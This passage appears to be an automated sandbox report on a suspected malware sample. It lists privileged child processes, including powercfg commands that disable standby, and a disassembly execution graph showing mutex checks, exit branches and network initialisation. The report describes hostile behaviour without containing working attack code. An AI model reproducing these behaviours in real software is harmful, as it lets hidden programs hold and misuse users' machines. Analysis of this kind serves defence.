                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:27
                                                                          Start time:09:07:31
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\powercfg.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                          Imagebase:0x7ff603010000
                                                                          File size:96'256 bytes
                                                                          MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:28
                                                                          Start time:09:07:31
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff66e660000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:29
                                                                          Start time:09:07:31
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\powercfg.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                          Imagebase:0x7ff7934f0000
                                                                          File size:96'256 bytes
                                                                          MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:30
                                                                          Start time:09:07:31
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff66e660000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:31
                                                                          Start time:09:07:31
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff66e660000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:32
                                                                          Start time:09:07:32
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\explorer.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:explorer.exe
                                                                          Imagebase:0x7ff609140000
                                                                          File size:5'141'208 bytes
                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:33
                                                                          Start time:09:07:33
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\explorer.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\EXPLORER.EXE {D4D7F2EA-38C9-468B-BF0E-B76E00A488F0}
                                                                          Imagebase:0x7ff609140000
                                                                          File size:5'141'208 bytes
                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:35
                                                                          Start time:09:09:17
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\explorer.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\EXPLORER.EXE {D4D7F2EA-38C9-468B-BF0E-B76E00A488F0}
                                                                          Imagebase:0x7ff799c70000
                                                                          File size:5'141'208 bytes
                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:36
                                                                          Start time:09:10:42
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\explorer.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\EXPLORER.EXE {D4D7F2EA-38C9-468B-BF0E-B76E00A488F0}
                                                                          Imagebase:0x7ff609140000
                                                                          File size:5'141'208 bytes
                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Disassembly

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:4.2%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:17.5%
                                                                            Total number of Nodes:2000
                                                                            Total number of Limit Nodes:50
                                                                            execution_graph 17474 7e60ff 17514 7eb160 17474->17514 17476 7e610b GetStartupInfoW 17477 7e611f HeapSetInformation 17476->17477 17479 7e612a 17476->17479 17477->17479 17515 7e98ee HeapCreate 17479->17515 17480 7e6178 17481 7e6183 17480->17481 17804 7e60d6 17480->17804 17516 7e8307 GetModuleHandleW 17481->17516 17484 7e6189 17485 7e6194 __RTC_Initialize 17484->17485 17486 7e60d6 _fast_error_exit 66 API calls 17484->17486 17541 7eaecf GetStartupInfoW 17485->17541 17486->17485 17489 7e61ae GetCommandLineA 17554 7eae38 GetEnvironmentStringsW 17489->17554 17496 7e61d3 17580 7eab07 17496->17580 17497 7e96c2 __amsg_exit 66 API calls 17497->17496 17499 7e61d9 17500 7e61e4 17499->17500 17502 7e96c2 __amsg_exit 66 API calls 17499->17502 17600 7e94a1 17500->17600 17502->17500 17503 7e61ec 17504 7e61f7 17503->17504 17505 7e96c2 __amsg_exit 66 API calls 17503->17505 17606 7eaaa8 17504->17606 17505->17504 17514->17476 17515->17480 17517 7e831b 17516->17517 17518 7e8324 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 17516->17518 17819 7e8054 17517->17819 17520 7e836e TlsAlloc 17518->17520 17523 7e83bc TlsSetValue 17520->17523 17524 7e847d 17520->17524 17523->17524 17525 7e83cd 17523->17525 17524->17484 17829 7e944a 17525->17829 17530 7e8478 17532 7e8054 __mtterm 70 API calls 17530->17532 17531 7e8415 DecodePointer 17533 7e842a 17531->17533 17532->17524 17533->17530 17838 7ec193 17533->17838 17536 7e8448 DecodePointer 17537 7e8459 17536->17537 17537->17530 17538 7e845d 17537->17538 17844 7e8091 17538->17844 17540 7e8465 GetCurrentThreadId 17540->17524 17542 7ec193 __calloc_crt 66 API calls 17541->17542 17549 7eaeed 17542->17549 17543 7e61a2 17543->17489 17812 7e96c2 17543->17812 17544 7eb062 17545 7eb098 GetStdHandle 17544->17545 17547 7eb0fc SetHandleCount 17544->17547 17548 7eb0aa GetFileType 17544->17548 17552 7eb0d0 InitializeCriticalSectionAndSpinCount 17544->17552 17545->17544 17546 7ec193 __calloc_crt 66 API calls 17546->17549 17547->17543 17548->17544 17549->17543 17549->17544 17549->17546 17553 7eafe2 17549->17553 17550 7eb00e GetFileType 17551 7eb019 InitializeCriticalSectionAndSpinCount 17550->17551 17550->17553 17551->17543 17551->17553 17552->17543 17552->17544 17553->17544 17553->17550 17553->17551 17555 7eae54 WideCharToMultiByte 17554->17555 17556 7e61be 17554->17556 17558 7eae89 17555->17558 17559 7eaec1 FreeEnvironmentStringsW 17555->17559 17567 7ead7d 17556->17567 17560 7ec14e __malloc_crt 66 API calls 17558->17560 17559->17556 17561 7eae8f 17560->17561 17561->17559 17562 7eae97 WideCharToMultiByte 17561->17562 17563 7eaea9 17562->17563 17564 7eaeb5 FreeEnvironmentStringsW 17562->17564 17565 7e46ad _free 66 API calls 17563->17565 17564->17556 17566 7eaeb1 17565->17566 17566->17564 17568 7ead97 GetModuleFileNameA 17567->17568 17569 7ead92 17567->17569 17571 7eadbe 17568->17571 18091 7e8ffe 17569->18091 18085 7eabe3 17571->18085 17574 7e61c8 17574->17496 17574->17497 17575 7eadfa 17576 7ec14e __malloc_crt 66 API calls 17575->17576 17577 7eae00 17576->17577 17577->17574 17578 7eabe3 _parse_cmdline 76 API calls 17577->17578 17579 7eae1a 17578->17579 17579->17574 17581 7eab10 17580->17581 17583 7eab15 _strlen 17580->17583 17582 7e8ffe ___initmbctable 94 API calls 17581->17582 17582->17583 17584 7ec193 __calloc_crt 66 API calls 17583->17584 17587 7eab23 17583->17587 17590 7eab4a _strlen 17584->17590 17585 7eab99 17586 7e46ad _free 66 API calls 17585->17586 17586->17587 17587->17499 17588 7ec193 __calloc_crt 66 API calls 17588->17590 17589 7eabbf 17591 7e46ad _free 66 API calls 17589->17591 17590->17585 17590->17587 17590->17588 17590->17589 17593 7eabd6 17590->17593 18532 7e88d8 17590->18532 17591->17587 17594 7e723a __invoke_watson 10 API calls 17593->17594 17596 7eabe2 17594->17596 17595 7ede27 _parse_cmdline 76 API calls 17595->17596 17596->17595 17598 7eac6f 17596->17598 17597 7ead6d 17597->17499 17598->17597 17599 7ede27 76 API calls _parse_cmdline 17598->17599 17599->17598 17602 7e94af __IsNonwritableInCurrentImage 17600->17602 18541 7ec12b 17602->18541 17603 7e94cd __initterm_e 17605 7e94ee __IsNonwritableInCurrentImage 17603->17605 18544 7e8792 17603->18544 17605->17503 17607 7eaabb 17606->17607 17608 7eaab6 17606->17608 17610 7e61fd 17607->17610 17611 7ede27 _parse_cmdline 76 API calls 17607->17611 17609 7e8ffe ___initmbctable 94 API calls 17608->17609 17609->17607 17612 7c1000 17610->17612 17611->17607 17613 7c100d __write_nolock 17612->17613 18609 7d8110 LoadLibraryW 17613->18609 17616 7c103d ExitProcess 17617 7c1045 _memset 17618 7c1061 GetModuleFileNameW 17617->17618 17619 7c107c ExitProcess 17618->17619 17620 7c1084 17618->17620 18693 7c9c90 LoadLibraryW 17620->18693 17626 7c10fb 17628 7c1109 17626->17628 18701 7d2680 17626->18701 17627 7c10f3 ExitProcess 18708 7cb860 17628->18708 17632 7c1199 18799 7d00a0 GetCommandLineW CommandLineToArgvW lstrcmpiW 17632->18799 17633 7c1117 OpenEventW 17635 7c113f OpenEventW 17633->17635 17636 7c1137 RtlExitUserThread 17633->17636 17637 7c116a RtlExitUserThread 17635->17637 17638 7c1172 SetEvent CloseHandle 17635->17638 17636->17635 17637->17638 18725 7dbb20 OpenMutexW LoadLibraryW LocalAlloc 17638->18725 17641 7c11aa OpenMutexW 17644 7c11ea CreateMutexW 17641->17644 17645 7c11d5 CloseHandle ExitProcess 17641->17645 17642 7c11a2 ExitProcess 17646 7c11fd ExitProcess 17644->17646 17647 7c1205 17644->17647 17648 7c126e 17647->17648 17652 7dc3a0 3 API calls 17647->17652 17649 7c12d3 CreateMutexW 17648->17649 18839 7dc090 GetModuleHandleA GetProcAddress 17648->18839 17650 7c12f9 GetLastError 17649->17650 17651 7c12f1 ExitProcess 17649->17651 17654 7c130e CreateMutexW 17650->17654 17655 7c1306 ExitProcess 17650->17655 17653 7c121c 17652->17653 17653->17648 17660 7dc090 3 API calls 17653->17660 17657 7c132c ExitProcess 17654->17657 17658 7c1334 17654->17658 18899 7dc4b0 ConvertStringSecurityDescriptorToSecurityDescriptorW 17658->18899 17662 7c1225 17660->17662 17662->17648 17665 7c122a 17662->17665 17669 7dc1e0 3 API calls 17665->17669 17666 7c1368 17670 7dc4b0 4 API calls 17666->17670 17667 7c1360 ExitProcess 17671 7c122f 17669->17671 17673 7c1372 17670->17673 17674 7c1234 17671->17674 17675 7c1252 17671->17675 17677 7c1382 GetModuleFileNameW 17673->17677 17678 7c1543 WSAStartup 17673->17678 19022 7c1c80 CreateEventW 17674->19022 17684 7c1c80 155 API calls 17675->17684 17676 7c12a5 17676->17649 18886 7d6870 LocalAlloc 17676->18886 17682 7c139e 17677->17682 17683 7c153b ExitProcess 17677->17683 17679 7c155e 17678->17679 17680 7c1556 ExitProcess 17678->17680 18904 7cfa30 GetModuleHandleW 17679->18904 19046 7cfe20 17682->19046 17688 7c125e 17684->17688 17688->17648 17689 7c1266 ExitProcess 17688->17689 17691 7c1248 ExitProcess 17692 7c1250 17692->17648 17695 7c156f 18910 7d7600 17695->18910 17696 7c1567 ExitProcess 17699 7c13db 17705 7c13e9 LocalAlloc 17699->17705 17700 7c1531 ExitProcess 17702 7c1578 ExitProcess 17703 7c1580 18914 7d41e0 17703->18914 17707 7c1411 GetTempPathW 17705->17707 17708 7c1522 LocalFree 17705->17708 17712 7c150d ExitProcess 17707->17712 17713 7c142b 17707->17713 17711 7c1539 17708->17711 17709 7c1589 ExitProcess 17710 7c1591 18924 7d42a0 17710->18924 17711->17678 17716 7c1439 lstrcmpiW 17713->17716 17719 7c145d lstrcmpiW 17716->17719 17720 7c150b LocalFree 17716->17720 17717 7c159a ExitProcess 17718 7c15a2 18937 7d43d0 17718->18937 17719->17720 17723 7c1479 GetCommandLineW CommandLineToArgvW lstrcmpiW 17719->17723 17720->17708 17723->17720 17725 7c14b8 lstrcmpiW 17723->17725 17725->17720 17728 7c14d1 lstrcmpiW 17725->17728 17726 7c15ab ExitProcess 17727 7c15b3 17729 7c15bc 17727->17729 17730 7c15d5 17727->17730 17728->17720 17731 7c14ea MessageBoxW 17728->17731 19055 7cfad0 17729->19055 18947 7cff10 SHGetKnownFolderPath 17730->18947 17731->17720 17734 7c1503 ExitProcess 17731->17734 17738 7c15ee 17739 7c15e6 ExitProcess 17805 7e60e9 17804->17805 17806 7e60e4 17804->17806 17808 7e9706 __NMSG_WRITE 66 API calls 17805->17808 17807 7e98b5 __FF_MSGBANNER 66 API calls 17806->17807 17807->17805 17809 7e60f1 17808->17809 17810 7e9420 __mtinitlocknum 3 API calls 17809->17810 17811 7e60fb 17810->17811 17811->17481 17813 7e98b5 __FF_MSGBANNER 66 API calls 17812->17813 17814 7e96cc 17813->17814 17815 7e9706 __NMSG_WRITE 66 API calls 17814->17815 17816 7e96d4 17815->17816 21081 7e968e 17816->21081 17820 7e805e DecodePointer 17819->17820 17822 7e806d 17819->17822 17820->17822 17821 7e807e TlsFree 17823 7e808c 17821->17823 17822->17821 17822->17823 17824 7ec611 DeleteCriticalSection 17823->17824 17825 7ec629 17823->17825 17857 7e46ad 17824->17857 17827 7ec63b DeleteCriticalSection 17825->17827 17828 7e8320 17825->17828 17827->17825 17828->17484 17883 7e800e EncodePointer 17829->17883 17831 7e9452 __init_pointers __initp_misc_winsig 17884 7e8506 EncodePointer 17831->17884 17833 7e83d2 EncodePointer EncodePointer EncodePointer EncodePointer 17834 7ec5ab 17833->17834 17835 7ec5b6 17834->17835 17836 7ec5c0 InitializeCriticalSectionAndSpinCount 17835->17836 17837 7e8411 17835->17837 17836->17835 17836->17837 17837->17530 17837->17531 17839 7ec19c 17838->17839 17841 7e8440 17839->17841 17842 7ec1ba Sleep 17839->17842 17885 7ee3e2 17839->17885 17841->17530 17841->17536 17843 7ec1cf 17842->17843 17843->17839 17843->17841 17896 7eb160 17844->17896 17846 7e809d GetModuleHandleW 17897 7ec725 17846->17897 17848 7e80db InterlockedIncrement 17904 7e8133 17848->17904 17851 7ec725 __lock 64 API calls 17852 7e80fc 17851->17852 17907 7e901c InterlockedIncrement 17852->17907 17854 7e811a 17919 7e813c 17854->17919 17856 7e8127 __mtinitlocknum 17856->17540 17858 7e46b8 HeapFree 17857->17858 17862 7e46e1 __dosmaperr 17857->17862 17859 7e46cd 17858->17859 17858->17862 17863 7e72de 17859->17863 17862->17823 17866 7e8145 GetLastError 17863->17866 17865 7e46d3 GetLastError 17865->17862 17880 7e8020 TlsGetValue 17866->17880 17869 7e81b2 SetLastError 17869->17865 17870 7ec193 __calloc_crt 62 API calls 17871 7e8170 17870->17871 17871->17869 17872 7e8178 DecodePointer 17871->17872 17873 7e818d 17872->17873 17874 7e81a9 17873->17874 17875 7e8191 17873->17875 17877 7e46ad _free 62 API calls 17874->17877 17876 7e8091 __getptd_noexit 62 API calls 17875->17876 17878 7e8199 GetCurrentThreadId 17876->17878 17879 7e81af 17877->17879 17878->17869 17879->17869 17881 7e8035 DecodePointer TlsSetValue 17880->17881 17882 7e8050 17880->17882 17881->17882 17882->17869 17882->17870 17883->17831 17884->17833 17886 7ee3ee 17885->17886 17891 7ee409 17885->17891 17887 7ee3fa 17886->17887 17886->17891 17889 7e72de __mtinitlocknum 65 API calls 17887->17889 17888 7ee41c HeapAlloc 17890 7ee443 17888->17890 17888->17891 17892 7ee3ff 17889->17892 17890->17839 17891->17888 17891->17890 17894 7e87b8 DecodePointer 17891->17894 17892->17839 17895 7e87cd 17894->17895 17895->17891 17896->17846 17898 7ec74d EnterCriticalSection 17897->17898 17899 7ec73a 17897->17899 17898->17848 17922 7ec663 17899->17922 17901 7ec740 17901->17898 17902 7e96c2 __amsg_exit 65 API calls 17901->17902 17903 7ec74c 17902->17903 17903->17898 18083 7ec64c LeaveCriticalSection 17904->18083 17906 7e80f5 17906->17851 17908 7e903d 17907->17908 17909 7e903a InterlockedIncrement 17907->17909 17910 7e904a 17908->17910 17911 7e9047 InterlockedIncrement 17908->17911 17909->17908 17912 7e9057 17910->17912 17913 7e9054 InterlockedIncrement 17910->17913 17911->17910 17914 7e9061 InterlockedIncrement 17912->17914 17915 7e9064 17912->17915 17913->17912 17914->17915 17916 7e907d InterlockedIncrement 17915->17916 17917 7e908d InterlockedIncrement 17915->17917 17918 7e9098 InterlockedIncrement 17915->17918 17916->17915 17917->17915 17918->17854 18084 7ec64c LeaveCriticalSection 17919->18084 17921 7e8143 17921->17856 17923 7ec66f __mtinitlocknum 17922->17923 17924 7ec695 17923->17924 17947 7e98b5 17923->17947 17932 7ec6a5 __mtinitlocknum 17924->17932 17983 7ec14e 17924->17983 17930 7ec6c6 17935 7ec725 __lock 65 API calls 17930->17935 17931 7ec6b7 17934 7e72de __mtinitlocknum 65 API calls 17931->17934 17932->17901 17934->17932 17937 7ec6cd 17935->17937 17938 7ec6d5 InitializeCriticalSectionAndSpinCount 17937->17938 17939 7ec700 17937->17939 17940 7ec6f1 17938->17940 17941 7ec6e5 17938->17941 17942 7e46ad _free 65 API calls 17939->17942 17988 7ec71c 17940->17988 17943 7e46ad _free 65 API calls 17941->17943 17942->17940 17945 7ec6eb 17943->17945 17946 7e72de __mtinitlocknum 65 API calls 17945->17946 17946->17940 17991 7eda4d 17947->17991 17949 7e98bc 17950 7e98c9 17949->17950 17951 7eda4d __NMSG_WRITE 66 API calls 17949->17951 17952 7e9706 __NMSG_WRITE 66 API calls 17950->17952 17954 7e98eb 17950->17954 17951->17950 17953 7e98e1 17952->17953 17955 7e9706 __NMSG_WRITE 66 API calls 17953->17955 17956 7e9706 17954->17956 17955->17954 17957 7e9727 __NMSG_WRITE 17956->17957 17958 7eda4d __NMSG_WRITE 63 API calls 17957->17958 17979 7e9843 17957->17979 17960 7e9741 17958->17960 17962 7e9852 GetStdHandle 17960->17962 17963 7eda4d __NMSG_WRITE 63 API calls 17960->17963 17961 7e98b3 17980 7e9420 17961->17980 17966 7e9860 _strlen 17962->17966 17962->17979 17964 7e9752 17963->17964 17964->17962 17965 7e9764 17964->17965 17965->17979 18016 7ed9ea 17965->18016 17969 7e9896 WriteFile 17966->17969 17966->17979 17969->17979 17970 7e9790 GetModuleFileNameW 17971 7e97b1 17970->17971 17975 7e97bd _wcslen 17970->17975 17973 7ed9ea __NMSG_WRITE 63 API calls 17971->17973 17972 7e723a __invoke_watson 10 API calls 17972->17975 17973->17975 17975->17972 17976 7ed8a8 63 API calls __NMSG_WRITE 17975->17976 17977 7e9833 17975->17977 18025 7ed91d 17975->18025 17976->17975 18034 7ed73c 17977->18034 18052 7e7fff 17979->18052 18062 7e93f5 GetModuleHandleW 17980->18062 17986 7ec157 17983->17986 17985 7ec18d 17985->17930 17985->17931 17986->17985 17987 7ec16e Sleep 17986->17987 18065 7e4619 17986->18065 17987->17986 18082 7ec64c LeaveCriticalSection 17988->18082 17990 7ec723 17990->17932 17992 7eda59 17991->17992 17993 7eda63 17992->17993 17994 7e72de __mtinitlocknum 66 API calls 17992->17994 17993->17949 17995 7eda7c 17994->17995 17998 7e728c 17995->17998 18001 7e725f DecodePointer 17998->18001 18002 7e7274 18001->18002 18007 7e723a 18002->18007 18004 7e728b 18005 7e725f __snwprintf 10 API calls 18004->18005 18006 7e7298 18005->18006 18006->17949 18010 7e7111 18007->18010 18011 7e7130 _memset __call_reportfault 18010->18011 18012 7e714e IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18011->18012 18013 7e721c __call_reportfault 18012->18013 18014 7e7fff __atodbl_l 5 API calls 18013->18014 18015 7e7238 GetCurrentProcess TerminateProcess 18014->18015 18015->18004 18017 7ed9ff 18016->18017 18018 7ed9f8 18016->18018 18019 7e72de __mtinitlocknum 66 API calls 18017->18019 18018->18017 18021 7eda20 18018->18021 18024 7eda04 18019->18024 18020 7e728c __snwprintf 11 API calls 18022 7e9785 18020->18022 18021->18022 18023 7e72de __mtinitlocknum 66 API calls 18021->18023 18022->17970 18022->17975 18023->18024 18024->18020 18028 7ed92f 18025->18028 18026 7ed933 18027 7e72de __mtinitlocknum 66 API calls 18026->18027 18029 7ed938 18026->18029 18033 7ed94f 18027->18033 18028->18026 18028->18029 18031 7ed976 18028->18031 18029->17975 18030 7e728c __snwprintf 11 API calls 18030->18029 18031->18029 18032 7e72de __mtinitlocknum 66 API calls 18031->18032 18032->18033 18033->18030 18060 7e800e EncodePointer 18034->18060 18036 7ed762 18037 7ed7ef 18036->18037 18038 7ed772 LoadLibraryW 18036->18038 18043 7ed809 DecodePointer DecodePointer 18037->18043 18050 7ed81c 18037->18050 18039 7ed787 GetProcAddress 18038->18039 18047 7ed887 18038->18047 18042 7ed79d 7 API calls 18039->18042 18039->18047 18040 7ed87b DecodePointer 18040->18047 18041 7ed852 DecodePointer 18041->18040 18045 7ed859 18041->18045 18042->18037 18046 7ed7df GetProcAddress EncodePointer 18042->18046 18043->18050 18044 7e7fff __atodbl_l 5 API calls 18048 7ed8a6 18044->18048 18045->18040 18049 7ed86c DecodePointer 18045->18049 18046->18037 18047->18044 18048->17979 18049->18040 18051 7ed83f 18049->18051 18050->18040 18050->18041 18050->18051 18051->18040 18053 7e8009 IsDebuggerPresent 18052->18053 18054 7e8007 18052->18054 18061 7ec455 18053->18061 18054->17961 18057 7ec572 SetUnhandledExceptionFilter UnhandledExceptionFilter 18058 7ec597 GetCurrentProcess TerminateProcess 18057->18058 18059 7ec58f __call_reportfault 18057->18059 18058->17961 18059->18058 18060->18036 18061->18057 18063 7e9419 ExitProcess 18062->18063 18064 7e9409 GetProcAddress 18062->18064 18064->18063 18066 7e4696 18065->18066 18069 7e4627 18065->18069 18067 7e87b8 _malloc DecodePointer 18066->18067 18068 7e469c 18067->18068 18070 7e72de __mtinitlocknum 65 API calls 18068->18070 18072 7e4655 RtlAllocateHeap 18069->18072 18074 7e4632 18069->18074 18076 7e4682 18069->18076 18077 7e87b8 _malloc DecodePointer 18069->18077 18080 7e4680 18069->18080 18073 7e468e 18070->18073 18071 7e98b5 __FF_MSGBANNER 65 API calls 18071->18074 18072->18069 18072->18073 18073->17986 18074->18069 18074->18071 18075 7e9706 __NMSG_WRITE 65 API calls 18074->18075 18079 7e9420 __mtinitlocknum 3 API calls 18074->18079 18075->18074 18078 7e72de __mtinitlocknum 65 API calls 18076->18078 18077->18069 18078->18080 18079->18074 18081 7e72de __mtinitlocknum 65 API calls 18080->18081 18081->18073 18082->17990 18083->17906 18084->17921 18087 7eac02 18085->18087 18089 7eac6f 18087->18089 18095 7ede27 18087->18095 18088 7ead6d 18088->17574 18088->17575 18089->18088 18090 7ede27 76 API calls _parse_cmdline 18089->18090 18090->18089 18092 7e900e 18091->18092 18093 7e9007 18091->18093 18092->17568 18419 7e8e63 18093->18419 18098 7eddd4 18095->18098 18101 7e4404 18098->18101 18102 7e4417 18101->18102 18108 7e4464 18101->18108 18109 7e81be 18102->18109 18105 7e4444 18105->18108 18129 7e8b5a 18105->18129 18108->18087 18110 7e8145 __getptd_noexit 66 API calls 18109->18110 18111 7e81c6 18110->18111 18112 7e441c 18111->18112 18113 7e96c2 __amsg_exit 66 API calls 18111->18113 18112->18105 18114 7e92dc 18112->18114 18113->18112 18115 7e92e8 __mtinitlocknum 18114->18115 18116 7e81be __getptd 66 API calls 18115->18116 18117 7e92ed 18116->18117 18118 7e931b 18117->18118 18119 7e92ff 18117->18119 18120 7ec725 __lock 66 API calls 18118->18120 18121 7e81be __getptd 66 API calls 18119->18121 18122 7e9322 18120->18122 18127 7e9304 18121->18127 18145 7e928f 18122->18145 18126 7e9312 __mtinitlocknum 18126->18105 18127->18126 18128 7e96c2 __amsg_exit 66 API calls 18127->18128 18128->18126 18130 7e8b66 __mtinitlocknum 18129->18130 18131 7e81be __getptd 66 API calls 18130->18131 18132 7e8b6b 18131->18132 18133 7ec725 __lock 66 API calls 18132->18133 18137 7e8b7d 18132->18137 18134 7e8b9b 18133->18134 18135 7e8be4 18134->18135 18138 7e8bcc InterlockedIncrement 18134->18138 18139 7e8bb2 InterlockedDecrement 18134->18139 18415 7e8bf5 18135->18415 18136 7e8b8b __mtinitlocknum 18136->18108 18137->18136 18141 7e96c2 __amsg_exit 66 API calls 18137->18141 18138->18135 18139->18138 18142 7e8bbd 18139->18142 18141->18136 18142->18138 18143 7e46ad _free 66 API calls 18142->18143 18144 7e8bcb 18143->18144 18144->18138 18146 7e929c 18145->18146 18152 7e92d1 18145->18152 18147 7e901c ___addlocaleref 8 API calls 18146->18147 18146->18152 18148 7e92b2 18147->18148 18148->18152 18156 7e90ab 18148->18156 18153 7e9349 18152->18153 18414 7ec64c LeaveCriticalSection 18153->18414 18155 7e9350 18155->18127 18157 7e913f 18156->18157 18158 7e90bc InterlockedDecrement 18156->18158 18157->18152 18170 7e9144 18157->18170 18159 7e90d4 18158->18159 18160 7e90d1 InterlockedDecrement 18158->18160 18161 7e90de InterlockedDecrement 18159->18161 18162 7e90e1 18159->18162 18160->18159 18161->18162 18163 7e90ee 18162->18163 18164 7e90eb InterlockedDecrement 18162->18164 18165 7e90f8 InterlockedDecrement 18163->18165 18166 7e90fb 18163->18166 18164->18163 18165->18166 18167 7e9114 InterlockedDecrement 18166->18167 18168 7e9124 InterlockedDecrement 18166->18168 18169 7e912f InterlockedDecrement 18166->18169 18167->18166 18168->18166 18169->18157 18171 7e91c8 18170->18171 18172 7e915b 18170->18172 18173 7e9215 18171->18173 18174 7e46ad _free 66 API calls 18171->18174 18172->18171 18181 7e918f 18172->18181 18184 7e46ad _free 66 API calls 18172->18184 18179 7e923e 18173->18179 18240 7ecdc6 18173->18240 18175 7e91e9 18174->18175 18177 7e46ad _free 66 API calls 18175->18177 18180 7e91fc 18177->18180 18183 7e9283 18179->18183 18186 7e46ad 66 API calls _free 18179->18186 18187 7e46ad _free 66 API calls 18180->18187 18188 7e46ad _free 66 API calls 18181->18188 18199 7e91b0 18181->18199 18182 7e46ad _free 66 API calls 18189 7e91bd 18182->18189 18190 7e46ad _free 66 API calls 18183->18190 18191 7e9184 18184->18191 18185 7e46ad _free 66 API calls 18185->18179 18186->18179 18192 7e920a 18187->18192 18193 7e91a5 18188->18193 18194 7e46ad _free 66 API calls 18189->18194 18195 7e9289 18190->18195 18200 7ed1a6 18191->18200 18197 7e46ad _free 66 API calls 18192->18197 18228 7ed13d 18193->18228 18194->18171 18195->18152 18197->18173 18199->18182 18201 7ed1b7 18200->18201 18227 7ed2a0 18200->18227 18202 7ed1c8 18201->18202 18203 7e46ad _free 66 API calls 18201->18203 18204 7e46ad _free 66 API calls 18202->18204 18207 7ed1da 18202->18207 18203->18202 18204->18207 18205 7ed1fe 18210 7ed210 18205->18210 18211 7e46ad _free 66 API calls 18205->18211 18206 7ed1ec 18206->18205 18209 7e46ad _free 66 API calls 18206->18209 18207->18206 18208 7e46ad _free 66 API calls 18207->18208 18208->18206 18209->18205 18212 7ed222 18210->18212 18213 7e46ad _free 66 API calls 18210->18213 18211->18210 18214 7ed234 18212->18214 18216 7e46ad _free 66 API calls 18212->18216 18213->18212 18215 7ed246 18214->18215 18217 7e46ad _free 66 API calls 18214->18217 18218 7ed258 18215->18218 18219 7e46ad _free 66 API calls 18215->18219 18216->18214 18217->18215 18220 7ed26a 18218->18220 18221 7e46ad _free 66 API calls 18218->18221 18219->18218 18222 7ed27c 18220->18222 18224 7e46ad _free 66 API calls 18220->18224 18221->18220 18223 7ed28e 18222->18223 18225 7e46ad _free 66 API calls 18222->18225 18226 7e46ad _free 66 API calls 18223->18226 18223->18227 18224->18222 18225->18223 18226->18227 18227->18181 18229 7ed14a 18228->18229 18230 7ed1a2 18228->18230 18231 7ed15a 18229->18231 18232 7e46ad _free 66 API calls 18229->18232 18230->18199 18233 7ed16c 18231->18233 18234 7e46ad _free 66 API calls 18231->18234 18232->18231 18235 7ed17e 18233->18235 18236 7e46ad _free 66 API calls 18233->18236 18234->18233 18237 7ed190 18235->18237 18238 7e46ad _free 66 API calls 18235->18238 18236->18235 18237->18230 18239 7e46ad _free 66 API calls 18237->18239 18238->18237 18239->18230 18241 7e9233 18240->18241 18242 7ecdd7 18240->18242 18241->18185 18243 7e46ad _free 66 API calls 18242->18243 18244 7ecddf 18243->18244 18245 